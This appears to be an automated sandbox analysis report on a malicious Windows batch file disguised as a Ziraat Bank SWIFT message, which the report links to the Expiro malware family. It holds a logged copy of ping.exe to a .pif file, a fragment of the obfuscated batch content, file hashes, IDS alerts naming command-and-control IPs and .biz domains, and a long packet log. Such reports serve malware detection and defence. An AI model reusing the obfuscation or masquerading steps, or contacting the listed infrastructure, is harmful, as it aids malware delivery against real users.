                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....

                                                                                                                                                                                                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.977049747966403
                                                                                                                                                                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        File name:Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                        File size:3'418'572 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:55275e90f2a4ca23422103276e8eae71
                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1799345fb5bf3cf04c44bfa5b59790c9e4e8a0af
                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA256:0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596
                                                                                                                                                                                                                                                                                                                                                                                                                                        SHA512:4ca26d59cba2e38751f527b12d040f1e5e67742020e3e0f93551b60f8600451e438c547d3c954778fc019889f93fb39a89ef5b214c4433a6c3f220ddabe7c26d
                                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:IHZYL1t28pLiMl5F3p03CX4axBJGhRCB4L90l6f2tliYajE/BPbN650iKBzFufPS:I5YLHFi05X03krZUFCsILZ4AX
                                                                                                                                                                                                                                                                                                                                                                                                                                        TLSH:7AF5B8EB3EBD274E670433AF5B4FF559072FCD140B815EC844C609C8959A71B29A0EAE
                                                                                                                                                                                                                                                                                                                                                                                                                                        File Content Preview:COMCOM@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ....

                                                                                                                                                                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                                                                                                                                                                        Icon Hash:9686878b929a9886

                                                                                                                                                                                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:16.977508+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049731198.252.105.91443TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:29.615807+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.1049801TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:29.615807+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.1049801TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:32.855723+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.104981754.244.188.17780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:32.879896+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.1049813TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:32.879896+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.1049813TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:35.956534+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.1049837TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:35.956534+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.1049837TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:36.575900+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10573241.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:38.044740+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10629371.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:38.352389+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10653371.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:57:41.443007+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10623951.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:15.074598+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.1050000TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:15.074598+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.1050000TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:19.231096+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10555941.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:20.626004+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10623891.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:23.402709+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.1050015TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:23.402709+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.1050015TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:31.308675+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.1050022TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:31.308675+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.1050022TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:35.573680+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.105002734.211.97.4580TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:35.578854+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.1050027TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:35.578854+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.1050027TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:44.845442+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.1050034TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:44.845442+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.1050034TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:45.663337+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.1050035TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:45.663337+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.1050035TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:49.060851+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.1050037TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:49.060851+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.1050037TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:09.939784+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.1050066TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:09.939784+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.1050066TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:19.305680+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.1050079TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:19.305680+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.1050079TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:19.336687+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.10507271.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:37.019071+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.105010954.244.188.17780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:46.275027+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.10650431.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:48.807296+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.10530301.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:52.433980+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.10513421.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:01.748310+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.10573931.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:08.841230+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.10558451.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:14.570669+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.10572501.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:21.993688+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.10562351.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:26.497191+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.10516781.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:37.951578+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.105022918.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:42.381982+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.10548411.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:45.214064+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10574861.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:46.809330+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10643761.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:57.859145+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10497261.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:59.215356+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10633271.1.1.153UDP

                                                                                                                                                                                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.294832945 CET49730443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.294891119 CET44349730198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.295052052 CET49730443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.295181990 CET49730443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.295330048 CET44349730198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.295440912 CET49730443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.354727030 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.354768038 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.354839087 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.356245995 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.356261969 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.977410078 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.977508068 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.980577946 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.980602026 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:16.980968952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.022533894 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.046955109 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.091336012 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.171885967 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.214540005 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290813923 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290836096 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290878057 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290887117 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290894032 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290941954 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290947914 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290947914 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290951014 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.290985107 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292458057 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292469025 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292521000 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292546034 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292558908 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292572021 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292601109 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409459114 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409499884 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409557104 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409578085 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409607887 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409626961 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.410969973 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.410984993 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.411048889 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.411062956 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.411115885 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528235912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528266907 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528337002 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528353930 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528388023 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528409958 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528870106 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528889894 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528973103 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528980017 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.529021025 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647005081 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647032976 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647088051 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647111893 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647142887 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647161007 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647887945 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647936106 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647973061 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647979975 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.648011923 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.648030996 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765144110 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765173912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765261889 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765261889 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765289068 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765331984 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766352892 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766375065 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766453981 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766453981 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766463041 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766648054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810058117 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810086966 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810148001 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810174942 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810204029 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810261965 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.884681940 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.884747982 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.884828091 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.884828091 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.884840965 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.884890079 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.928688049 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.928719044 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.928761005 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.928771019 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.928848982 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.928848982 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.002784967 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.002827883 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.002917051 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.002938032 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.003016949 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.003016949 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.003618956 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.003643036 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.003710032 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.003721952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.003748894 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.003812075 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.047499895 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.047538996 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.047619104 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.047631979 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.047677994 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.047677994 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.128999949 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.129033089 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.129141092 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.129159927 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.129172087 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.129375935 CET49731443192.168.2.10198.252.105.91
